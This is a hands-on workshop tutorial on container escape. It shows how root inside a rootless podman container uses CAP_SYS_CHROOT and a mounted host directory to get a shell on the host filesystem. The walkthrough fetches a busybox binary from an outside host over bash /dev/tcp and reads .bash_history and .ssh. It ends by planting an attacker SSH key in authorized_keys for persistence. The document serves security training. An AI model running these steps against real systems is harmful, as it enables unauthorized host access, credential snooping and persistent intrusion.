Container Escapes 101 - Privilege escalation
In this workshop, we’re going to explore escapes using chroot. This is a great way to cross the boundary between a container’s filesystem and the host’s filesystem.
This one starts with a story …
We have a question from the <redacted> Red Team that has been testing our systems for the past two weeks and I was wondering what your response would be. What they are asking: “Let’s say that a user that was given our same privileges and access was able to escalate their privileges to root or an admin, what could they have possibly done with that level of privilege? Could they potentially “break out” and pivot to some other portion of the network?”
As far as I’m aware, there isn’t a possible path to become root/admin once the container is running as the non-root user.
… and ends with a demonstration of how dangerously wrong that assumption is. 😈
Yeah … no
Privilege escalation works more or less the same in a container as it does on the host. The only marginally complex step that running in a container adds is that you may not have a shell, or you may not have a way to run commands as root inside the container. This means you may need to add an extra privesc on your way out … and that’s it. 🫠
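If you do land in a container as a non-root user, that extra privesc starts with the same enumeration you’d do on any other Linux box. A generic sketch (nothing here is specific to this workshop’s image, and some of these tools may simply not exist in a slim container):

# who are we, and what groups do we have?
id
# anything we can run as root without a password?
sudo -l
# any SUID binaries worth abusing?
find / -perm -4000 -type f 2>/dev/null
# any mounted secrets or credentials lying around? (path is just an example)
ls -la /run/secrets 2>/dev/null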
Workshop setup
Our starting assumption is that we’ve gotten root access in our container, but the container runtime is running as a non-root user. This is the recommended setup in production, but it doesn’t mean that we can’t escalate privileges.
Open two SSH sessions to your VM. In one, let’s install podman to run our container as a non-root user. While it’s possible to run Docker as a non-root user, that would mess with our other workshops, and podman works just as well for this one.
user@escapes:~$ sudo apt install podman -y
# # # lots of output # # #
user@escapes:~$ podman run -it -v /home/user:/mnt ubuntu:24.04
Resolved "ubuntu" as an alias (/etc/containers/registries.conf.d/shortnames.conf)
Trying to pull docker.io/library/ubuntu:24.04...
Getting image source signatures
Copying blob e3bd89a9dac5 done |
Copying config b24db5c17b done |
Writing manifest to image destination
root@62fd214d4ac8:/#
And in the second, verify that the podman command is running as a non-root user.
user@escapes:~$ ps aux | grep podman
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
user 3259 0.1 1.0 1860624 41180 pts/0 Sl+ 01:26 0:03 podman run -it -v /home/user:/mnt ubuntu:24.04
user 3274 0.0 0.0 9192 2704 ? Ss 01:26 0:00 /usr/bin/conmon --api-version 1 -c 62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b -u 62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b -r /usr/bin/runc -b /home/user/.local/share/containers/storage/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata -p /run/user/1000/containers/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata/pidfile -n dreamy_shirley --exit-dir /run/user/1000/libpod/tmp/exits --full-attach -s -l journald --log-level warning --syslog --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/user/1000/containers/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata/oci-log -t --conmon-pidfile /run/user/1000/containers/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /home/user/.local/share/containers/storage --exit-command-arg --runroot --exit-command-arg /run/user/1000/containers --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/user/1000/libpod/tmp --exit-command-arg --network-config-dir --exit-command-arg --exit-command-arg --network-backend --exit-command-arg netavark --exit-command-arg --volumepath --exit-command-arg /home/user/.local/share/containers/storage/volumes --exit-command-arg --db-backend --exit-command-arg sqlite --exit-command-arg --transient-store=false --exit-command-arg --runtime --exit-command-arg runc --exit-command-arg --storage-driver --exit-command-arg overlay --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg 62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b
user 3332 0.0 0.0 3552 1792 pts/1 S+ 02:07 0:00 grep --color=auto podman
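If you’d rather not eyeball ps output, podman can report this directly. A quick check (assuming a reasonably recent podman where this template field exists):

# should print "true" for a rootless setup
user@escapes:~$ podman info --format '{{.Host.Security.Rootless}}'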
Where we’re going
The exact same things we’ve been doing so far.
- ✅ became root in the container
- … find something on the host to read, write, or otherwise be valuable
- maybe escalate privileges on the host or pivot elsewhere
Looking around
Using what we learned before, let’s take a look around inside of our container.
❓ What user are we running as on the host?
hint
Look at the mounts listing, specifically the overlay mount.
example answer
root@62fd214d4ac8:/# cat /etc/mtab
overlay / overlay rw,relatime,lowerdir=/home/user/.local/share/containers/storage/overlay/l/CZFEJ3VG7B6IWKDST56HMI7S5V,upperdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/diff,workdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/work,redirect_dir=nofollow,uuid=on,userxattr 0 0
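The upperdir and workdir paths live under /home/user, which strongly suggests the container’s storage, and the process running it, belong to the host user user. One way to pull just that path out (a small sketch that assumes the mtab layout shown above):

# print the upperdir path(s) from the overlay entries
root@62fd214d4ac8:/# sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab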
❓ What filesystems does your container see that could be interesting?
hint
Keep looking at /etc/mtab for a shared mount, socket, or other fun thing.
example answer
root@62fd214d4ac8:/# cat /etc/mtab
overlay / overlay rw,relatime,lowerdir=/home/user/.local/share/containers/storage/overlay/l/CZFEJ3VG7B6IWKDST56HMI7S5V,upperdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/diff,workdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/work,redirect_dir=nofollow,uuid=on,userxattr 0 0
/dev/sda2 /mnt ext4 rw,relatime 0 0
/dev/sda2 /mnt/.local/share/containers/storage/overlay ext4 rw,relatime 0 0
overlay /mnt/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/merged overlay rw,relatime,lowerdir=/home/user/.local/share/containers/storage/overlay/l/CZFEJ3VG7B6IWKDST56HMI7S5V,upperdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/diff,workdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/work,redirect_dir=nofollow,uuid=on,userxattr 0 0
overlay /mnt/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/merged overlay rw,relatime,lowerdir=/home/user/.local/share/containers/storage/overlay/l/CZFEJ3VG7B6IWKDST56HMI7S5V,upperdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/diff,workdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/work,redirect_dir=nofollow,uuid=on,userxattr 0 0
shm /mnt/.local/share/containers/storage/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=64000k,uid=1000,gid=1000,inode64 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,uid=1000,gid=1000,inode64 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=100004,mode=620,ptmxmode=666 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /run/.containerenv tmpfs rw,nosuid,nodev,relatime,size=399432k,nr_inodes=99858,mode=700,uid=1000,gid=1000,inode64 0 0
tmpfs /etc/hostname tmpfs rw,nosuid,nodev,relatime,size=399432k,nr_inodes=99858,mode=700,uid=1000,gid=1000,inode64 0 0
tmpfs /etc/resolv.conf tmpfs rw,nosuid,nodev,relatime,size=399432k,nr_inodes=99858,mode=700,uid=1000,gid=1000,inode64 0 0
tmpfs /etc/hosts tmpfs rw,nosuid,nodev,relatime,size=399432k,nr_inodes=99858,mode=700,uid=1000,gid=1000,inode64 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=64000k,uid=1000,gid=1000,inode64 0 0
cgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot 0 0
udev /dev/null devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/random devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/full devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/tty devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/zero devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/urandom devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
devpts /dev/console devpts rw,nosuid,noexec,relatime,gid=100004,mode=620,ptmxmode=666 0 0
proc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/fs proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/irq proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0
udev /proc/kcore devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /proc/keys devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /proc/latency_stats devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /proc/timer_list devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
tmpfs /proc/scsi tmpfs ro,relatime,uid=1000,gid=1000,inode64 0 0
tmpfs /sys/firmware tmpfs ro,relatime,uid=1000,gid=1000,inode64 0 0
tmpfs /sys/dev/block tmpfs ro,relatime,uid=1000,gid=1000,inode64 0 0
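That’s a lot of mounts. If the wall of text is hard to scan, filtering for the volume we passed in with -v narrows it down quickly:

root@62fd214d4ac8:/# grep ' /mnt ' /etc/mtab
/dev/sda2 /mnt ext4 rw,relatime 0 0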
❓ What capabilities do I have?
hint
cat /proc/self/status | grep Cap is probably a good place to start.
example answer
root@62fd214d4ac8:/# cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 00000000800405fb
CapEff: 00000000800405fb
CapBnd: 00000000800405fb
CapAmb: 0000000000000000
Taking a look from the host to decode these capabilities, we see that we have the following:
user@escapes:~$ capsh --decode=00000000800405fb
0x00000000800405fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_sys_chroot,cap_setfcap
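If you’d rather decode inside the container instead, capsh comes from the libcap2-bin package, which you may need to install first (this assumes the container can reach the package mirrors):

root@62fd214d4ac8:/# apt update && apt install -y libcap2-bin
root@62fd214d4ac8:/# capsh --decode=00000000800405fb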
❓ Given all of the above, what seems like a reasonable next step?
hint
We have CAP_SYS_CHROOT and a writable mount somewhere in the host's root filesystem.
example answer
Make some mischief!!! 🙀
Now let’s make some mischief
Now let’s start looking around on the host. We can use that mount, chroot into it, then explore.
# try to chroot into the host's filesystem
root@62fd214d4ac8:/# chroot /mnt/ /bin/bash
chroot: failed to run command '/bin/bash': No such file or directory
# nothing to execute inside /mnt, so grab a static busybox binary over HTTP using bash's /dev/tcp (no curl or wget in this image)
root@62fd214d4ac8:/# export RHOST=files.some-fantastic.com
root@62fd214d4ac8:/# export RPORT=80
root@62fd214d4ac8:/# export LFILE=busybox-aarch64/busybox
root@62fd214d4ac8:/# bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > busybox'
# now make it executable
root@62fd214d4ac8:/# perl -e 'chmod 0755, "busybox"'
# and move it to position
root@62fd214d4ac8:/# cp busybox /mnt
# aaaaand go!
root@62fd214d4ac8:/# chroot /mnt/ ./busybox sh
/ #
🎉 A successful chroot! We now have a shell in the host’s filesystem, running as the same unprivileged host user that launched podman (the container’s root maps to that user through the user namespace).
Our host system sees and confirms this process:
user@escapes:~$ ps aux | grep busybox
user 6206 0.0 0.0 2232 768 pts/0 S+ 03:48 0:00 ./busybox sh
user 6217 0.0 0.0 3552 1792 pts/1 S+ 04:09 0:00 grep --color=auto busybox
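Back inside the chroot, keep in mind that / is really the host user’s home directory, and our only tooling is the busybox we copied in. A little exploration (the files below are just examples of what might be present):

# list the host user's home directory (the chroot's /)
/ # ./busybox ls -la /
# peek at anything interesting, if it exists
/ # ./busybox cat /.bash_history
/ # ./busybox ls -la /.ssh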
Oh no, what now?
The possibilities were endless! We could have opened a reverse shell, downloaded a different binary, or continued enumerating the host filesystem for goodies.
This maps to persistence, lateral movement, and/or privilege escalation, depending on what we chose to do. We have reasonably unrestricted access to the host from a container.
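As one concrete, hypothetical example of persistence: /mnt is the host user’s home directory and container root maps to that user, so we could drop an SSH key there. The key below is a placeholder, and this assumes the host runs sshd and allows key-based logins for that user:

# from inside the container: /mnt is the host user's home directory
root@62fd214d4ac8:/# mkdir -p /mnt/.ssh && chmod 700 /mnt/.ssh
root@62fd214d4ac8:/# echo 'ssh-ed25519 AAAA...placeholder... attacker@example' >> /mnt/.ssh/authorized_keys
root@62fd214d4ac8:/# chmod 600 /mnt/.ssh/authorized_keys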
Back to the index.